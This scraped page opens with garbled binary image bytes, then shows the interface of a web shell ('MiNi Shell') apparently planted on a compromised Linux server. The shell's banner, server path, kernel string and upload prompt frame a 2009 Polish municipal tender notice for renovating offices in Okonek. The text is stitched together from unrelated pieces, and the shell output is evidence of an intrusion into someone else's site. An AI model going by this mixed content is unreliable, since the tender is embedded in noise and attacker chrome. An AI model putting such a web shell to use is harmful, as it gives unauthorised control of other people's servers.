JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090909/151267-N-2009.html

<p class="kh_header"><b>Okonek: Adaptacja pomieszczeń w budynku ZGKiM, przy ul. Leśnej 46 w Okonku na biura Miejsko-Gminnego Ośrodka Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 151267 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Okonek , ul. Niepodległości 53, 64-965 Okonek, woj. wielkopolskie, tel. 067 2660957, 2669003, faks 067 2669976.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.okonek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja pomieszczeń w budynku ZGKiM, przy ul. Leśnej 46 w Okonku na biura Miejsko-Gminnego Ośrodka Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje  :

 W zakresie robót ogólnobudowlanych :
a) wykonanie pokrycia dachowego ze styropapy o grubości 15 cm, istniejące rynny, rury spustowe i obróbki blacharskie należy zdemontować i ułożyć nowe,
b) naprawa i odnowienie elewacji poprzez skucie i wykonanie nowych tynków       w miejscach istniejących ubytków, ściany należy ocieplić styropianem gr. 10 cm (F20) umocowanym na klej i dyble plastykowe,  a następnie należy wykonać tynk strukturalny w kolorze istniejącej elewacji,
c) naprawienie i wyrównanie tynków wewnętrznych gładziami gipsowymi oraz ich  pomalowanie,
d) wykonanie podwieszonego sufitu na stelażu systemowym,
e) wykonanie izolacji poprzez ułożenie 2 x folii budowlanej i styropianu gr. 5 cm (F20),
f) wykonanie posadzki o grubości 8 cm z betonu B-15,
g) wyłożenie terakotą typu GRES przeciwślizgowy wszystkich podłóg                  w pomieszczeniach,
h) wymiana stolarki otworowej ( okien i drzwi  na PCV ) z zachowaniem światła otworu :
- okna 110 x 140  -  9 szt.
- drzwi zewnętrzne  120 x 200  - 1 szt.
- drzwi wewnętrzne  90 x 200  - 7 szt.  i  80 x 200  - 1 szt.
i) wykonanie parapetów zewnętrznych z blachy ocynkowanej powlekanej w kolorze brąz  oraz parapetów wewnętrznych z PCV,
j) wymiana instalacji elektrycznej na miedzianą wraz z całym osprzętem,
W zakresie instalacji centralnego ogrzewania :
a) nInstalację c.o. wykonać z rur instalacyjnych miedzianych łączonym lutem miękkim. Do rozgałęzień stosować kształtki miedziane łączone przez lutowanie. Główny rurociąg zasilający i powrotny ( poziome przewody rozprowadzające ) prowadzić w posadzce pomieszczeń. Przewody montowane w posadzce, bruzdach  ściennych i pionowe odcinki przewodów prowadzone we wnękach oraz odcinki pionowe pomiędzy przewodem a grzejnikiem montowane w bruzdach izolować pianką poliuretanową. W celu podłączenia armatury i grzejników stosować kształtki przejściowe z gwintem dostarczane w komplecie przez producenta grzejników CosmaNova - Vogel & Not.
b) Gałązki do grzejników zaprojektowanych w budynku wykonać z rur o średnicy  16 x 2,0 mm łącząc grzejnik przy pomocy zestawu przyłączeniowego CosmoBlok. 
c) Do ogrzewania pomieszczeń w budynku mieszkalnym przyjęto grzejniki płytowe firmy V&N CosmoNova typu V - zasilane od dołu ściany : typ 22KV - dwupłytowe, o wysokości 600 mm. Podłączenie grzejników projektuje się od strony podłogi.
W zakresie instalacji wodno - kanalizacyjnej i c.w.u.
a) Zasilanie wewnętrznej instalacji w wodę projektuje się z istniejącej sieci wodociągowej w istniejącym budynku. Wewnętrzną instalację wykonać z rur instalacyjnych miedzianych o średnicach od 15 mm, łączonych za pomocą złączek lutowanych. Piony wody zimnej oraz podejścia do punktów czerpalnych będą prowadzone w specjalnych kanałach sanitarnych..
b) Rurociągi w pomieszczeniach ułożyć w bruzdach w posadzce parteru i na poddaszu oraz zabezpieczyć otuliną izolacyjną dla rur miedzianych. Rurociągi poziome należy zaizolować łupkami piankowymi zabezpieczonymi folią PCV.
c) Instalacja ciepłej wody ogranicza się do zamontowania bezciśnieniowego elektrycznego podgrzewacza wody zamontowanego bezpośrednio nad umywalką.
d) Odprowadzanie ścieków z budynku użyteczności publicznej projektuje się do projektowanego przyłącza kanalizacji sanitarnej.
e) Wewnętrzną instalację wykonać z rur i kształtek z tworzyw sztucznych PCV kanalizacyjnych, uszczelnionych za pomocą uszczelek gumowych. Przewody poziome kanalizacji sanitarnej będą prowadzone w gotowym, suchym wykopie za spadkiem w kierunku wyjścia kanalizacji z budynku do projektowanego przyłącza kanalizacyjnego. Przewody poziome układać na podsypce piaskowej  o grubości 15 cm. Na pionach należy zamontować rewizję (czyszczak) umożliwiającą ewentualne przeczyszczenie poziomów kanalizacji. Na pionie, do którego podłączone są muszle ustępowe zaprojektowano w najwyższym punkcie pionu rurę wywiewną.
Przyłącze kanalizacyjne wykonać z rury PCV 160 włączając do istniejącej sieci kanalizacji sanitarnej DN 200 oddalonej od budynku 2 m. Na istniejącym rurociągu zamontować kinetę 200 x 160 i zamontować studzienkę rewizyjną Dn 300 z włazem.

Szczegółowy zakres rzeczowy  został określony w kosztorysach ofertowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.31.12.00-2, 45.42.11.00-5, 45.33.11.00-7, 45.33.23.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia obowiązującego wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> . W postępowaniu mogą brać udział wykonawcy, którzy :   
   
1) posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, osobami zdolnymi do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 ustawy  Pzp.

Ad. 1)
1. są uprawnieni do działalności zgodnie z wymaganiami ustawowymi, 
2. posiadają uprawnienia do wykonywania czynności objętych zamówieniem zgodnie z wymaganiami ustawowymi, w tym względzie dysponują osobami posiadającymi odpowiednie kwalifikacje budowlane do kierowania robotami będącymi przedmiotem zamówienia ( art. 42 ust. 3 ustawy Prawo budowlane ) 

Ad. 2)
a) wykażą i udokumentują ( referencje lub opinie lub listy polecające ) w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) wykonanie robót budowlanych odpowiadających przedmiotowi zamówienia i o wartości nie mniejszej niż 100.000 zł każda,
b) dysponują pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót
c) dysponują sprzętem niezbędnym do realizacji zamówienia.

Ad. 3) 
1. znajdują się w sytuacji finansowej i ekonomicznej gwarantującej wykonanie robót w ustalonym terminie, w tym względzie posiadają własne lub udokumentują dostęp do środków finansowych zapewniających ciągłość wykonywania robót, w wysokości nie mniejszej niż 50.000 zł.
2. posiadają możliwości sfinansowania wykonanych robót .

Ad. 4)
Nie podlegają wykluczeniu w rozumieniu art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące dokumenty i załączniki:

1) wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik
 nr 1 do niniejszej specyfikacji,
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
3) Oświadczenie, zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych z wykorzystaniem wzoru -  załącznik nr 2 do niniejszej specyfikacji,
4) Oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych                    z wykorzystaniem wzoru - załącznik nr 3 do niniejszej specyfikacji.
5) Oświadczenia o :
a) udzieleniu 36 miesięcznego okresu gwarancji jakości na wykonane roboty,
b) uporządkowaniu terenu po zakończeniu robót,
c) terminie wykonania zamówienia,
6) Kosztorys ofertowy opracowany metodą uproszczoną na podstawie dokumentacji projektowej oraz :
a) wskaźniki kalkulacyjne tj. rbh, koszty pośrednie (łącznie z kosztami zakupu ), zysk,
b) zestawienie materiałów wraz z cenami ( nie mogą być inne niż podane w kosztorysie ofertowym ).
6) Wykaz kadry kierowniczej i personelu przewidzianego do wykonania robót  wraz
 z informacją na temat kwalifikacji zawodowych tych osób ( krótki opis doświadczeń zawodowych ). 
7) Wykaz niezbędnego sprzętu do wykonania zamówienia.
8)  Wykaz wykonanych przez wykonawcę w okresie ostatnich 5 lat robót 
   odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym 
     przedmiot zamówienia, a jeżeli okres działalności jest krótszy od w/w, za ten 
     okres.  Wykaz powinien zawierać : 
nazwę i adres zamawiającego, rodzaj wykonanych robót, które odpowiadają robotom będącym przedmiotem zamówienia (wraz ze wskazaniem danych szczegółowych opisanych w warunku) , termin ich rozpoczęcia i zakończenia, 
wartość robót.
9) Dokumenty potwierdzające, że roboty zostały wykonane należycie, np. referencje lub opinie, protokoły odbioru albo listy polecające.

Kopie dokumentów należy potwierdzić za zgodność z oryginałem 
przez Wykonawcę lub osobę upoważnioną.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.okonek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, 64-965 OKONEK, ul. Niepodległości 53.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 10:00, miejsce: Urząd Miejski, 64-965 OKONEK, ul. Niepodległości 53, Punkt Obsługi Interesanta, budynek B, pokój nr 18a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com